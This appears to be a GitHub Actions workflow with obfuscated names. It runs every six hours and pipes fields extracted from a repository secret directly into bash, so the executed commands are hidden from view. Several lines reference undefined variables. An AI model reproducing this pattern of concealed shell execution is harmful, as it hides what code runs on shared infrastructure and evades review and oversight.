name: doaizhou

on:
  workflow_dispatch:
  schedule:
    - cron: '29 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: doaizhou
        env:
          e19: ${{ secrets.e19 }}
        run: |
          echo $e19 | jq -r .fks97773 | /bin/bash
          echo $esxu3 | jq -r .nefz89671 | /bin/bash
          echo $r2919 | jq -r .anogj2590 | /bin/bash
          echo $p032 | jq -r .tqebb06734 | /bin/bash
          echo $kklry6 | jq -r .ens2 | /bin/bash

